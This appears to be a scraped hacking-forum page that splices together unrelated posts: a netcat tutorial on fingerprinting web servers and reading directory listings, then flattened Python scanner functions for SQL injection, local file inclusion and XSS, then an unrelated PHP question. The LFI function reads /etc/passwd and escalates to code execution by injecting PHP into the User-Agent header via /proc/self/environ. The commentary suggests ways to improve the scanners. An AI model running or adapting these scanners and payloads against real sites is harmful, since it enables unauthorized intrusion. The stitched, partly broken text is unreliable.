EvilZone

I was asked to start a blog to give the public tutorials on security challenge sites (like securityoverride, smash the stack, etc) and this is one of them. I wrote it a day or so ago to help someone with a challenge on securityoverride.
-----
"Fingerprinting web servers is a technique for finding more information about the server for further testing. When I say fingerprinting, it's basically just identifying the server based around the information it gives you, allowing you to know what kind of software it is running."

http://aichi-ninja.blogspot.com/2013/03/fingerprinting-web-servers.html----

 Identifying VersionsWith simple requests to the server we can find out what software it is using. GET or POST requests will do. Requesting objects (files) that are not there or making requests for options that the server does (and does not) support are good places to start.
aichi@home# nc 127.0.0.1 81 
head / http/1.0 
HTTP/1.1 501 Method Not Implemented 
Date: Fri, 22 Mar 2013 04:13:18 GMT 
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5 
Allow: GET,HEAD,POST,OPTIONS,TRACE 
Content-Length: 206 
Connection: close 
Content-Type: text/html; charset=iso-8859-1 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>501 Method Not Implemented</title> 
</head><body> 
<h1>Method Not Implemented</h1> 
<p>head to / not supported.<br /> 
</p> 
</body></html> 
The above is an output of the netcat command and a GET request to a local server here. HTTP requests are case sensitive. The server tried to process the option head and found that there was none. However it does show us all the options it allows: GET, HEAD, POST, OPTIONS and TRACE. We now also know the software the server is running, Apache, and it's version, 2.2.1.7. The operating system and even some of the other software is also listed (PHP, ModSSL and OenSSL).

aichi@home# nc 127.0.0.1 81 
HEAD / AICHI/6.6.6 
HTTP/1.1 200 OK 
Date: Fri, 22 Mar 2013 04:19:29 GMT 
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5 
Connection: close 
Content-Type: text/html;charset=UTF-8
Using other methods supported by the server we can even get a listing (assuming there is not index file in place). Let's try the GET method.

aichi@home# nc 127.0.0.1 81 
GET / AICHI/6.6.6 
HTTP/1.1 200 OK 
Date: Fri, 22 Mar 2013 04:23:28 GMT 
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8q PHP/5.3.5 
Connection: close 
Content-Type: text/html;charset=UTF-8 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> 
<html> 
<head> 
  <title>Index of /</title> 
   </head> 
   <body> 
  <h1>Index of /</h1> 
  <table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr> 
  <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="0fees/">0fees/</a>         </td><td align="right">12-Feb-2013 19:56 </td><td align="right"> - </td><td>&nbsp;</td></tr> 
  <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="ForwardElectric%20Backup/">ForwardElectric Backup/</a></td><td align="right">07-May-2012 08:31 </td><td align="right"> - </td><td>&nbsp;</td></tr> 
I supplied an invalid version (aichi/6.6.6) and it still listed the directory contents, and yes, there was no index file. Let's see what it looks like with a blank index file.

def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in sqlerrors.items(): if re.search(eMSG, source): print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found" logfile.write("\n"+host) vuln.append(host) col.append(host) break else: pass except: pass
this should have been expanding into breaking all the URL's parameters (GET). This SQL injection scanner (above) also doesn't test POST.

def ClassicLFI(url): lfiurl = url.rsplit('=', 1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found" lfi_log_file.write("\n"+lfiurl+lfi) vuln.append(lfiurl+lfi) target = lfiurl+lfi target = target.replace("/etc/passwd","/proc/self/environ") header = "<? echo md5(baltazar); ?>" try: request_web = urllib2.Request(target) request_web.add_header('User-Agent', header) text = urllib2.urlopen(request_web) text = text.read() if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text): print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found" rce_log_file.write("\n",target) vuln.append(target) except: pass except: passThe LFI tester (above) only works on UNIX based systems. you can see they tried to break out the GET parms, but it's kinda ugly. i also suggest maybe they use a time() type of md5 instead of a steady "baltazar" md5 to check if the LFI was successful, otherwise it can be thwarted easily into giving a false-positive.

def ClassicXSS(url): for xss in xsses: try: source = urllib2.urlopen(url+xss.replace("\n","")).read() if re.findall("XSS by baltazar", source) or re.findall("XSS by NovaCygni", source): print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)" xss_log_file.write("\n"+url+xss) vuln.append(url+xss) except: pass
the xss checker (above) can be hugely expanded, plus what about content filtering? eh, this isn't very reliable. The sql scanners are ok, probably the best part of the whole scanner. nice code, but i think they have become lazy.

SIDE QUESTION: Whats the point in using fread()

using file_get_contents will give you the entire contents of a file (or remote URL) into a big string. fread is handy when reading a certain length of bytes from a file, or reading data from a socket (or whatever stream)